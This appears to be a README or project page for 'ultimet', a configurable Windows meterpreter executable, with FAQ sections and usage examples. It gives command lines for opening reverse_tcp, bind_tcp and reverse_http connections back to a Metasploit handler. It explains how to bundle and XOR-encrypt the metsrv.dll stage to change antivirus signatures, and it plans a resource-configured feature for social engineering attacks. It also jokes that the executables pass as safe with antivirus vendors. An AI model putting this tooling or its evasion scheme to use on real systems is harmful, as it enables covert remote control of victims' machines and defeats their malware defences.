

Compiling from source, usage examples & FAQ


0. Executive Summary 🙂


  • Is a windows executable that can function as various meterpreter stand-alone exe’s, in addition to functioning as “msfpayload” to generate exe files that run hidden when executed.
  • Supports functioning as the following meterpreter “types”: “reverse_tcp”, “bind_tcp”, “reverse_http”, “reverse_https”, “metsvc_bind_tcp” and “metsvcreverse_tcp”
  • Can create exe files that connects upon execution using pre-configured settings “exactly as msfpayload generated exe”, however, generated exe files still accept command line arguments and settings could be reset or changed, all supported from within that single exe … “meterpreter-on-steroids :)”.
  • The generated exe is a pre-configured ultimet that can be used to create OTHER exe files! so, let’s say you created a reverse_tcp exe using the --msfpayload option, you can use THAT exe later to create another bind_metsvc, then use THAT exe to create a reverse_http … and so on, or simply reset to default…pretty neat! ultimet is a program that once found its way to inside a windows environmet, you won’t need msfpayload or msfvenom anymore to create different exe files for different settings, use the same exe for different situations
  • The msfpayload-like functionality works under linux perfectly fine using “wine >= 1.3.17”, no need to leave your beloved *n?x box to create a pre-configured exe.
  • Supports many options to load the stage from: Resource, Encrypted-Resource, file, encrypted file or over the network “stager-mode” … it functions as a non-staged payload “inline” when the stage is provided “either through file or the default bundled-resource”.
  • Offset of ReflectiveLoader function is calculated at runtime and bootstrap is patched in memory, so, in plain english, you can use your own self-compiled metsrv.dll as the stage!.Working as payload:Example#1: Connect back to a meterpreter/reverse_tcp handler, LPORT=4444, LHOST= -t reverse_tcp -h -p 4444Example#2: Start listening “bind” on all interfaces waiting for a meterpreter/bind_tcp handler to connect, LPORT=8888ultimet.exe -t bind_tcp -h -p 8888Example#3: Load stage from local file, connect back to a meterpreter/reverse_http handler, LPORT=8080, LHOST= -f c:\wwwroot\uploads\metsrv.dll -t reverse_http -h -p 8080Working as msfpayload:

    Example#1: msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=

    ultimet.exe -t reverse_tcp -h -p 4444 --msfpayload

    Example#2: Reset exe to default and remove all pre-set connection settings

    ultimet.exe --reset

    Example#3: Remove bundled stage to create a smaller file

    ultimet.exe --remove-stage

1. Introduction

  • Stand-alone meterpreter executables that are created using (msfpayload/msfvenom) are not flexible in selecting the LHOST, LPORT or even the transport after being created … i.e. once you create the exe, you cannot change any of the settings you specified during the creation of the executable.
  • Meterpreter by design is a “staged” payload, it consists of a “stager” and a “stage”; when msfpayload|msfvenom create an exe, that’s the “stager” part of meterpreter, which has only one purpose: When executed, connect back to the exploit/multi/handler, make room for the stager, copy the “stage” from handler, then execute the “stage” … that “stage” is nothing but a patched version of “metsrv.dll” that you find in metasploit directory … this scenario presents a challenge in highly secure environments(!) where incoming files from the internet are checked for viruses :) … example: someone created a meterpreter/reverse_http exe using msfvenom, then he manages to bypass AV somehow and successfully executed this exe on one machine inside the target environment, if there’s some kind of virus checking of downloaded files at the gateway/proxy level … the “stage” gets flagged, not downloaded, not executed, and you’re doomed.

2. What is ultimet?

  • ultimet is a flexible “meterpreter” exe that takes LPORT, LHOST, TRANSPORT and many other options as command line arguments.
  • It supports multiple options to include the “stage” with the exe, turning it into a single stage “inline” meterpreter.
  • It is NOT a payload “i.e. you can’t use it as a shellcode for an exploit”, it’s a stand-alone exe.

3. What are the supported transports (payloads)?

  • It supports “reverse_tcp”, “bind_tcp”, “reverse_http”, “reverse_https” and “bint_metsvc & reverse_metsvc <- when stage included”.
  • meterpreter/bind_tcp and metsvc_bind_tcp are to be added soon, god willing, since it will require very little code additions to what is already there. bind support already added by Anwar Mohamed “@anwarelmakrahy”

4. How exactly is the stage “included”?

  • The “stage” can be loaded using any of the following options:
    • From a resource, or an encrypted resource that is included in the exe itself.
    • From a file (metsrv.dll), or an encrypted file.
    • … if stage is not available, stage gets loaded over the network, which is basically falling back into “stager-mode”.

5. inmet & ultimet

The zip file contains two exe, inmet & ultimet:

  • inmet is (ultimet + stage as a resource) that is the (exe) that has the (stage as a resource).
  • ultimet is (inmet – stage as resource) that is JUST THE EXE.
  • so, if you used any PE resource editor to crack open inmet.exe, you’ll find a resource called “BINARY” and ID “101”, if you deleted that resource, it will still work, but as a stager only.
  • … if you took that “stripped-down” exe again, opened it, and imported metsrv.dll (or the encrypted version of it) into that exe, called the resource “BINARY” and set the ID to “101” … it will become an inline exe again.
  • inmet and ultimet are SAME EXECUTABLE that detects when it’s just a mere stager, or the inline version of the executable.
  • Got it? … if not just download both and try to figure out the difference on your own …

6. Encryption?!

  • ultimet will load metsrv.dll if it is plain (the one in your computer) or encrypted using the following scheme:
    • XOR every byte % a random 16-bytes key (position = i % 16; metsrv[i] ^= key[position])
    • PREPEND the whole encrypted metsrv.dll with the 16 bytes random key 🙂
  • FIPS compliant, strong and unbreakable encryption, I know, thank you … but it gets the job done pretty well “AV sig change”.
  • A tool is included that does this automatically (ultimet_xor.exe) … just drag metsrv.dll over it and you’ll get a file called “encrypted.rsc” … import that into ultimet.exe, they’ll know how to play nice with each other.

7. Known issues

  • Currently the ReflectiveDLL bootstrap has the RVA_to_file offset of the ReflectiveLoader hardcoded, so, you cannot use your own metsrv.dll if that offset is different without changing the offset in “constants.h” … working on it. Not anymore, now the RVA to file offset is calculated at runtime.
  • If you want to use UPX on ultimet, do that AFTER you pre-configure it with –msfpayload option.
  • If your linker complained about not finding “encrypted.rsc” … open “inmet.rc” using a text editor, and hard code the path there “or just put it on the root of your “e:\” drive … to lazy to fix that and VS can be a **** sometimes.

8. Bug reporting

9. Author

… P.S: I am not a developer 😉

10. Contributors:

  • Anwar Mohamed “@anwarelmakrahy” Added support for metsvc_bind_tcp & bind_tcp … also parsing the metsrv.dll at runtime for ReflectiveLoader function offset, and proper patching of the ReflectiveLoader bootstrap.

11. Acknowledgments

  • All the extremely helpful people at #metasploit, and the mailing list: hdm, corelanc0d3r, mihi, egypt, kernelsmith, tillo.
  • Stephen Fewer for helping with ReflectiveDll stuff.
  • @lnxg33k, @anwarelmakrahy & Yehia Mamdouh: for testing and bug reporting.


  • Provide an option to add parameters “lport, lhost … etc.” as a resource so it can be used in social engineering attacks et’all “thanks mihi”. Check!
  • Add bind_tcp and metsvc_bind_tcp as options. Check!
  • Dynamically retrieve the RVA_to_file offset of ReflectiveLoader. Check!
  •  … anything else? please comment.

almost forgot … if you found any of those two executables running in your environment, don’t worry, they’re perfectly safe according to AV gurus 🙂

Edit: Now they’re flagged by AV “as expected” … anyway, you have the source code 😉

Screenshot (272)

Screenshot (273)